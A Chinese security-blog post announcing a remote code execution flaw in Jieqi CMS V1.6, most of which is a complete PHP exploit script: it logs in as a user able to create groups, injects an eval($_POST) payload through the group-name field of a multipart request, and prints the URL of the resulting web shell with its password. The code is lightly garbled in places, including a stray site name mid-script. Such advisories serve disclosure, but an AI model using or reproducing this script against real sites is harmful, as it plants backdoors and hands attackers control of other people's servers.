漏洞播报:Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞

  • A+
所属分类:Seay信息安全博客

显示不全请点击全屏阅读

杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。

 
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
 需要有一个能创建圈子的用户。
 
<?php
 
print_r('
+---------------------------------------------------------------------------+
Jieqi CMS V1.6 PHP Code Injection Exploit
by flyh4t
mail: phpsec at hotmail dot com
team: http://www.wolvez.org
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
*/
if ($argc < 5) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path username
host:      target server (ip/hostname)
path:      path to jieqicms 
uasename:  a username who can create group
Example:
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
+---------------------------------------------------------------------------+
');
exit;
}
 
error_reporting(7);
ini_set('max_execution_time', 0);
 
$host = $argv[1];
$path = $argv[2];
$username = $argv[3];
$password = $argv[4];
 
/*get cookie*/
$cookie_jar_index = 'cookie.txt';
$url1 = "http://$host/$path/login.php";
$params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1";
$curl1 = curl_init();
curl_setopt($curl1, CURLOPT_URL, $url1);
curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index);
curl_setopt($curl1, CURLOPT_POST, 1);
curl_setopt($curl1, CURLOPT_POSTFIELDS, $params);
ob_start();
$data1 = curl_exec($curl1);
if ($data1 === FALSE) {
echo "cURL Error: " . curl_error($ch);
exit('exploit failed');
}
curl_close($curl1);
ob_clean();
 
/*get shell*/
 
$params ='-----------------------------23281168279961
Content-Disposition: form-data; name="gname"
 
';
$params .="';";
$params .='eval($_POST

);//flyh4t -----------------------------23281168279961 Content-Disposition: form-data; name="gcatid" 1 -----------------------------23281168279961 Content-Disposition: form-data; name="gaudit" 1 -----------------------------23281168279961 Content-Disposition: form-data; name="gbrief" 1 -----------------------------23281168279961-- '; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url;

 
 

作者:fly@wolvez

 

Tags:

杰奇CMS漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
漏洞播报:Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞